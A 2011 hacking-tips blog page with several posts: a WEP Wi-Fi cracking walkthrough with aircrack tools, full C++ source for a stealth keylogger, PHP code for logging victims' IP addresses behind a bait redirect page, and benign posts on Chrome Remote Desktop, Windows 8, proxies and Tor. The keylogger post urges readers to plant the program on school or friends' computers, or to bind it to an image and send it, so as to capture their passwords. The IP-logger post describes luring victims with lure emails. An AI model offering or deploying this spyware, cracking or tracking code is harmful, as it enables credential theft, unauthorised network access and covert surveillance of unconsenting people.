Wednesday, December 28, 2011

How To Hack Wireless WEP Protected Netwotks Using Backtrack!

Before even starting to read this make sure you have compatible wireless adapter!

For this tutorial you will need backtrack, you can download from here (I am using Backtrack 5 for this tutorial).
Once downloaded you can either burn the .ISO to a cd and boot it, or you can make a frugal install using UNetbootin.


Ok, when you successfully start backtrack go to Applications > Exploitation Tools > Wireless Exploitation Tools > Wlan Exploitation > gerix-wifi-cracker-ng.

[Image: 86437852.png]

Once the program is started go to "Configuration" tab.

[Image: 79399926.png]

Press "Set random MAC address"

[Image: 12150512.png]

Then "Enable/Disable Monitor Mode"

[Image: 21993618.png]

Now press "Rescan networks" and choose the slave.

[Image: 48030887.png]

Then press the "WEP" tab, you will see the "Start Sniffing and logging" button, press that. A new window will pop-up that's airodump console. Look at the "Data" you will need 10000-20000 Data/IV's to crack the wep key (Sometimes more).

[Image: 42338878.png]

Now we are gonna speed up the proccess of getting necessary Data/IV's. Press the "WEP Attacks (No-Client)"

[Image: 20865461.png]

Then press "Associate with AP using fake auth"

[Image: 72909853.png]

A new shell console will pop-up, wait untill it asks you "Use this packet? Type "Y" and hit enter.

[Image: 39811637.png]

Now press "Fragmented Attack" again a new shell console will pop-up and it will ask you "Use this packet? Type "Y" and hit enter.

[Image: 66665680.png]

Wait 20-30 seconds until you get enough Data/IV's to crack the WEP key.

[Image: 38943479.png]

Once you get enough Data/IV's go to "Cracking" tab and press "Aircrack-ng Decrypt WEP Password" New shell console will pop-up, when finished decrypting it will look something like this.

[Image: 77928950.png]

Video Tutorial:


Friday, October 28, 2011

Remotely Access another Computers using Google Chrome



New chrome extension named as Chrome Remote Desktop BETA that allows users to access another computer remotely. This is first software that demonstrate the Core Chrome Remoting Technology.



This version enables users to share with or get access to another computer by providing a one-time authentication code. Access is given only to the specific person the user identifies for one time only, and the sharing session is fully secured. One potential use of this version is the remote IT helpdesk case. The helpdesk can use the Chrome Remote Desktop BETA to help another user, while conversely a user can receive help by setting up a sharing session without leaving their desk. Additional use cases such as being able to access your own computer remotely are coming soon.



Chrome Remote Desktop BETA is fully cross-platform, so you can connect any two computers that have a Chrome browser, including Windows, Linux, Mac and Chromebooks.



This app can access:

Your data on accounts.google.com, www.google.com, and 2 other websites - see all

All data on your computer and the websites you visit

Your tabs and browsing activity

Download

Private Access Codes:





As per the user review:

It is performing good. You may need better internet connection.



Thursday, October 6, 2011
Windows 8 Developers Preview
[Direct Link]



Windows 8 Developer Preview Build 8102 M3 (32 & 64 Bit) ISO

Information:
Review: Microsoft demoed their upcoming Windows 8 OS during the BUILD conference today along with the sneak peek to developers platform and tools. Windows 8 includes plethora of new features which includes the all new immersive Metro style UI, Internet Explorer 10 (IE10), Task Manager, Quick boot, Face password, Cloud integration etc. They also made available the Windows 8 Developer Preview copy to all the attendees out there along with a Samsung Tablet so that the developer community can play with it and give feedback before the RTM hits store. And for the rest of us the very same files will be uploaded to their public servers and will be available soon.

Features:
The main feature that was shown is the extensively redesigned user interface, optimized for touchscreens as well as mice and keyboards. A new "Start screen", similar to the one in Windows Phone 7, includes live application tiles. It replaces the Start menu, being triggered by the Start button or Windows key, and is also the first screen shown on startup. The user can go to the regular desktop by choosing the "Desktop" tile or a traditional desktop-based application. The Start screen also displays the user's name and avatar. Windows 8 has a new developer platform according to Microsoft Vice President Christopher Ham, who called it "our new developer platform, which is...based on HTML5 and JavaScript. The new applications run in full-screen, but two of them can be displayed side-by-side using "Snap". Examples of new applications that were demoed include a Twitter client, a weather application, a stock-tracking application, an RSS news feeder, and a virtual piano.

The new interface is primarily designed for 16:9 screen resolutions, with 1366×768 and larger screens able to display two Windows 8 applications. 1024×768 screens can display one Windows 8 application in full-screen, and 1024×600 screens can only use the traditional Windows desktop. Mike Angiulo confirmed at Computex 2011 that Windows 8 will use OEM Activation 3.0 instead of OEM Activation 2.1 (used by Windows 7), which supposedly makes it less prone to cracks. Windows 8 features a new lock screen that shows the date and time and notifications, along with a customisable background.
Windows 8 will also include Microsoft's Hyper-V virtualization tool. Previously only offered in Windows Server, Hyper-V will now be available in client versions of Windows for the first time. The system requirements for Hyper-V are a 64-bit processor, a 64-bit version of Windows 8, and a minimum of 4 GB of RAM. Hyper-V also requires a 64-bit system that has Second Level Address Translation (SLAT), a feature that helps with memory management. Many of Intel's and AMD's recent processors support this feature, including many of Intel's i-Series processors (with Extended Page Table) and AMD's 10h family processors. On September 8, 2011, Microsoft announced that Windows 8 has short boot times, because it saves the kernel's memory to the hard disk on shutdown (similar to the existing Hibernate option) and reloads it on startup.
Cofiguration Details: All configuration same as Windows 7 (32 & 64 Bit)
Download Instructions: Click on download link to start download directly from MS own server. Direct download with resumable option.

System Requirements-
Windows Developer Preview works great on the same hardware that powers Windows Vista and Windows 7
1 gigahertz (GHz) or faster 32-bit (x86) or 64-bit (x64) processor
1 gigabyte (GB) RAM (32-bit) or 2 GB RAM (64-bit)
16 GB available hard disk space (32-bit) or 20 GB (64-bit)
DirectX 9 graphics device with WDDM 1.0 or higher driver
Taking advantage of touch input requires a screen that supports multi-touch
To run Metro style Apps, you need a screen resolution of 1024 X 768 or greater.



Windows 8 Developers PreviewWindows 8 Developers Preview
Windows 8 Developers Preview
Windows 8 Developers Preview
Windows 8 Developers Preview




Direct Download Link-

Download Now (32 bit)
size: 2.8 gb

Download Now (64 bit)
size: 3.6 gb




Saturday, August 20, 2011

Learn To create Keylogger using C++|Basic Hacking Tutorials

Hi friends, the most interesting part  of the hacking is spying.  Today i am going to introduce to the C++ Spyware code.   It is going to be very fun.  You can install this spyware in your college/school  or in your friend system, and get their username and passwords.  This is very simple hacking trick when compared to phishing web page.







Disadvantage of Phishing Web page:

you have to upload phishing web page to web hosting.  But only few website won't detect the phishing webpage.

website url is different. Easy to detect that we are hacking.



Advantage of Spyware-keylogger:

Very simple and easy method.

Victim can't detect that we are hacking.



How to create Keylogger using Visual C++?

Requirements:

Dev C++.  Download it from here: http://www.bloodshed.net/

Knowledge about Visual C++(need, if you are going to develop the code).



Install dev C++ in your system and open the dev C++ compiler.

Go to File->New->Source File.

you can see a blank works space will be there in window.

now copy the below keylogger code into the blank work space.

#include <iostream>

using namespace std;

#include <windows.h>

#include <winuser.h>

int Save (int key_stroke, char *file);

void Stealth();



int main()

{

Stealth();

char i;



while (1)

{

for(i = 8; i <= 190; i++)

{

if (GetAsyncKeyState(i) == -32767)

Save (i,"LOG.txt");

}

}

system ("PAUSE");

return 0;

}



/* *********************************** */



int Save (int key_stroke, char *file)

{

if ( (key_stroke == 1) || (key_stroke == 2) )

return 0;



FILE *OUTPUT_FILE;

OUTPUT_FILE = fopen(file, "a+");



cout << key_stroke << endl;



if (key_stroke == 8)

fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");

else if (key_stroke == 13)

fprintf(OUTPUT_FILE, "%s", "\n");

else if (key_stroke == 32)

fprintf(OUTPUT_FILE, "%s", " ");

else if (key_stroke == VK_TAB)

fprintf(OUTPUT_FILE, "%s", "[TAB]");

else if (key_stroke == VK_SHIFT)

fprintf(OUTPUT_FILE, "%s", "[SHIFT]");

else if (key_stroke == VK_CONTROL)

fprintf(OUTPUT_FILE, "%s", "[CONTROL]");

else if (key_stroke == VK_ESCAPE)

fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");

else if (key_stroke == VK_END)

fprintf(OUTPUT_FILE, "%s", "[END]");

else if (key_stroke == VK_HOME)

fprintf(OUTPUT_FILE, "%s", "[HOME]");

else if (key_stroke == VK_LEFT)

fprintf(OUTPUT_FILE, "%s", "[LEFT]");

else if (key_stroke == VK_UP)

fprintf(OUTPUT_FILE, "%s", "[UP]");

else if (key_stroke == VK_RIGHT)

fprintf(OUTPUT_FILE, "%s", "[RIGHT]");

else if (key_stroke == VK_DOWN)

fprintf(OUTPUT_FILE, "%s", "[DOWN]");

else if (key_stroke == 190 || key_stroke == 110)

fprintf(OUTPUT_FILE, "%s", ".");

else

fprintf(OUTPUT_FILE, "%s", &key_stroke);



fclose (OUTPUT_FILE);

return 0;

}



/* *********************************** */



void Stealth()

{

HWND Stealth;

AllocConsole();

Stealth = FindWindowA("ConsoleWindowClass", NULL);

ShowWindow(Stealth,0);

}



Compile the Code(Ctrl+F9)





Now execute the program by selecting Execute->Run(ctrl+F10)



now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.

you can see the log.txt file where you save the file.







bind the exe file with image or any files and send it to your friend.

(0r)

if you have physical access to your college/school system,then copy the exe file in that system and run it.



For now, i just give simple keylogger. Soon i will post most efficient keylogger's program code.





How to Send Data on a Right Click to Your Desired Folder?

 

Whenever you attach a removable disk and want to send some items in it, you have option either you select the required files and do a CTRL –C, open the removable disk and do a CTRL-V or you select the required files right click on it and there you find “Send To” option. In “Send To” you find the name of removable disk and you simply send the items into it. Well, What if i get the name of my own desired folder there which I use frequently for keeping my stuff.

 

Now in this post I will be telling you how you can create your own folder with in any name in “Send To” option so that whenever you will copy any files or folders, you will simply send them to your folder instead of using CTRL-C and CTRL-V.

 

1) Firstly you’ll have to access hidden files. So change your view settings to make all hidden files visible.

Tools -> folder options -> view (tab) and select the show hidden files and folders.

 

2) In Windows 7 also you will have to unmark “hide system protected files and folder”. After that you can see all the hidden system protection file, now go to

C:\Users\UserName\SendTo folder.

 

3) Open up my computer and locate your most used folders let us take “Fun”. Create a shortcut of the most used folders (Fun) in

C:\Users\UserName\SendTo folder.

 

4) You can do this in a number of ways.

Right click -> send to desktop (create shortcut) and move the shortcut from the desktop to the C:\Users\UserName\SendTo folder.

Copy the most used folder and go to C:\Users\UserName\SendTo folder and right click -> paste shortcut.

 

5) Now your customized “Send To” option is ready to go.

 

Share this post with your friends if you liked this post .

 

How to log IP of Victim using Web page? Ip Logger[Method 1]

So far, i have give some third party websites to track ip address of victim.  Today we are going to create our own website or webpage to track victim IP address.  I have written this PHP code for you.



Let me explain in two different methods

Method 1:

Log ip and redirect to some other interesting webpage(like "cute kittens pictures" page) or trusted page (like "facebook" page).



Method 2:

Log the ip and remains in same page( without redirection). I think "you won't select this method.



In this post , i will explain the method 1.







Requirements:

  • Any free hosting site and basic knowledge about file uploading to hosting.
  • url shortening sites account like co.cc,co.nr[optional]


Method 1-IP log php code: 

Step 1:

Create account in any free web hosting service.



Step 2:

Open notepad++ or notepad (if you have notepadd++, it will better to edit).

Paste the following code:

<?php
header("Location:index1.php");

$file="iplog.txt";

$f=fopen($file,'a');

fwrite($f,"-------------------------"."\n");

fwrite($f,"IP Address:".$_SERVER['REMOTE_ADDR']."\n");

fwrite($f,"User Agemt:".$_SERVER['HTTP_USER_AGENT']."\n");

fwrite($f,"Host Name:".php_uname('n')."\n");

fwrite($f,"Operating System:".php_uname('v')."(".php_uname('s').")"."\n");

fclose($f);

//provided by Amazingtricks4u.co.cc

?>


and save it as index.php



Code Explanation:

If you don't want to know how it is logging the IP, you can skip to the step 3.



header("Location:index1.php"); this will redirect to index1.php page.

 You can specify any other location instead.  For example, if you want to redirect to www.interestingwebsite.com ,then change the code as

header("Location: http://www.interestingwebsite.com");

or

header("Location: http://www.interestingwebsite.com/post.php");

 

$f=fopen($file,'a');  opens the file iplog.txt in append mode( add the contents at the end of file)and store the pointer in variable f.



fwrite($f,string) will write the string into the file(iplog.txt) for example, if the string is "hello", it will be stored inside iplog.txt file.



so fwrite($f,"-------------------------"."\n"); will insert ----------- inside the iplog.txt



fwrite($f,"IP Address:".$_SERVER['REMOTE_ADDR']."\n");

here $_SERVER['REMOTE_ADDR'] is build function ,returns IP address(if you run locally in your pc using wamp/xampp, it will return 127.0.0.1). So after ---------- lines, the "Ip address:127.0.0.1" will be append.



Now the iplog.txt file contains:

--------------------

IP Address: 127.0.0.1
$_SERVER['HTTP_USER_AGENT'] returns the current user agent used by victim.  It will contains information about the browser details(mozilla 3.6,ie),operating system(xp,linux).



php_uname('n') returns the Host name .  Now the iplog.txt contains



--------------------

IP Address: 127.0.0.1

User Agent: Mozilla (linux) (ubuntu 11.10) Mozilla3.6

HostName: xxxx.limestonenetwork.com


fclose($f); will close the opened file.



Step 3:

Open notepad and save the file as "iplog.txt"



Step 4:

again open the notepad and create your own php or html page. It should be some interesting contents(download any website templates,rename the index.html file to index1.html).

Example 1(html):

<html>

<body>

<img src="cutekittens.jpg"/>

</body>

</html>
save the file as index1.html.

Example 2(php):

<html>

<head>

<title><?php echo "Cute kittens"; ?></title>

</head>

 <body>

 <img src="cutekittens.jpg"/>

</body>

</html>
 save the file as index1.php





Step 5:

Now you have 3 files namely index.php,index1.php,iplog.txt.

Upload these files to your hosting.

File uploaded to hosting account
set iplog.txt permisson to read and write by global.



Set file permission for iplog.txt


Step 4:

Check whether it is working or not by visiting the your hosting sub domain account.

For example:

http://uraccount.hosting.com/index.php

if you enter the url, it will redirect from index.php to index1.php.

Now open the iplog.txt.  There you can see the logged information.



Step 5:

Send to your friend or victim with attractive mail content and title. At the end, ask him to visit the link to know more about the info.







Redirected to index1.php





Logged Details ,stored in iplog.txt file



Once he visit the link, his IP address is in your hands.

How to Setup your own Proxy Server For Free using Hamachi and Privoxy?

Read this post to know  What is proxy server?


Why should i use Proxy server?




Open Wi-Fi Connections:

It is possible for anyone to monitor everything you do on an Open Wi-Fi Network. Not all sites that you visit may use HTTPS Encryption. Sometimes even sites that do use HTTPS only do so for certain actions and then revert to regular unencrypted HTTP connections, which are visible by anyone on the network. Using a proxy server will direct all web traffic through a secure and encrypted tunnel making all of your browsing safe and unseeable.





Bypass Firewalls and Corporate Web Filtering:

Users who wish to bypass web monitoring and restrictions imposed by their employer may utilize Proxy Servers. This is great for users and dangerous for IT Professionals as it may pose a danger to network security.



How to Set up the proxy server using Hamachi and Privoxy? 

Requirements:

  1. 2 computers. One works proxy server. Other one use the proxy server(client). Both system should have Internet connection.
  2. Hamachi: A free (for non-commercial use), cross-platform VPN service that, gives you secure access to your home network no matter where you are. Download it from here:
    https://secure.logmein.com/products/hamachi2/
  3. Privoxy: A free, Privoxy is a non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk. Privoxy has a flexible configuration and can be customized to suit individual needs and tastes. It has application for both stand-alone systems and multi-user networks. Download it from here:

    http://www.privoxy.org/
Installing Hamachi and Set up the Server

Step 1: 
 Decide which Computer is going to work as Proxy Server.  Install the Hamachi in that computer.

Step 2:

Once you installed, run the application.  It will open small Hamachi application window with thanks message.



Step 3:

Click the Power Button.  It will automatically detect the host name and ask you to register the client.



Once you registered, it will show some IP address like 5.xx.xxx.xxx near to the power button.  Note this is our proxy ip Address.



Step 4:
Now you will get two options. 1. Create New Network 2.Join an existing Network.

This is server Computer, we have to create network to used by client.

So click the Create a New Network button.



Step 5:
It will ask you to enter network id and password(i entered id as proxy_BreakTheSecurity).   Enter your desire id and password(Should be strong password).

Click the Create button.



That's all your server is ready to be used.



Using Our Proxy Server in client Side

Now move to your client system( i mean any other computer).  Install Hamachi in your that system.

Follow the first three step mentioned above.

Step 4:

Now you will get two options. 1. Create New Network 2.Join an existing Network.

This is Client System, right? so Click the Join an Existing network.





Step 5:

Enter the Network id and password that you used to create network.  (in my case, network id i entered is proxy_BreakTheSecurity)



You can rinse and repeat this on every machine you want to do this with, for up to 16 clients (that’s the limit for Hamachi’s free-for-non-commercial-use version)



Installing the Privoxy in the client system:

Install the privoxy and run.

Step 1:
In system tray, you can see P icon. right click on the P

and select Edit->Main Configuration.





Step 2:
It will open the config.txt file in notepad.

Search for the "listen-address 127.0.0.1:8118"

Replace the 127.0.0.1 with our proxy ip address(address that displayed in server hamachi apps) created in server side.

For example listent-address 5.xx.xxx.xxx:8118

Save the file.





That's all you finished.  Restart the privoxy.

Now we have to use the Proxy server.



Set Up Your Web Browser to Use Your New Secure Proxy:
Open the Mozilla Firefox

Open Tools->Preferences.

It will open the preference window of Firefox.

Select Advanced->Network tab.

Click the Settings button near to the "Configure how Firefox connects to the Internet”

Select the Manual proxy configuration.

Enter our Server Proxy Address(5.xx.xxx.xx) and port as 8118.

click ok.







Test the Proxy Server.

Now we have to test whether our proxy is working or not.



Visit http://config.privoxy.org/. It will detect whether you use proxy or not.



If proxy is used, you’ll see a message like “This is Privoxy 3.0.17 on Windows (5.xxx.xxx.xx), port 8118, enabled.”



If not, you’ll see a page that reads “Privoxy is not being used”.





Also, if you’re on a public Wi-Fi connection and you navigate to something like WhatIsMyIP.com with your proxy turned off, you should see a different IP when you reload the page with your proxy turned on.

(Essentially, when turned on, your home’s public IP address should be showing.)



Even though your proxy is running over an HTTP connection, Hamachi is encrypting everything that runs between your computers, so it’s still a secure option

How the Proxy servers working ? How it hides our IP Address.

You know that Proxy Servers is able to hide your IP address.   But you may not know what is the process of Server and How it hides the IP address.  This Post will explain it in details.



When we visit website using Proxy Server ,the request is send to Proxy server first.  Then from Proxy server the request will be send to the original Server.    So  The Sever assumes  that  request come from IP address of Proxy server.





Thus a proxy server hides our identity by acting as an intermediary between us and the web server that we are accessing. Suppose we break into a server using a proxy server thinking that we are anonymous. But what if owner of web server starts enquiring about the clients connecting to it using the proxy server  and it is possible that owners of proxy server might  reveal our identity. This means we cant actually rely on proxy servers for being anonymous online.



THE ONION ROUTING (TOR):

 Here comes the concept of THE ONION ROUTING (TOR) into picture. By using this , the client traffic is supposed to be passed from three different servers or nodes before reaching to actual web server. It may randomly take any path through any three nodes.







Lets consider it has taken path shown by green arrows. Now



* Node 1 knows only actual origin(client) but not actual destinantion(web server).

*Node 5 neither knows actual origin nor actual destinantion.

*Node 9 knows actual destination but not actual origin.



Thus no one exactly knows which client is accessing which web server. So it is highly anonymous.


Updates Via E-Mail

Labels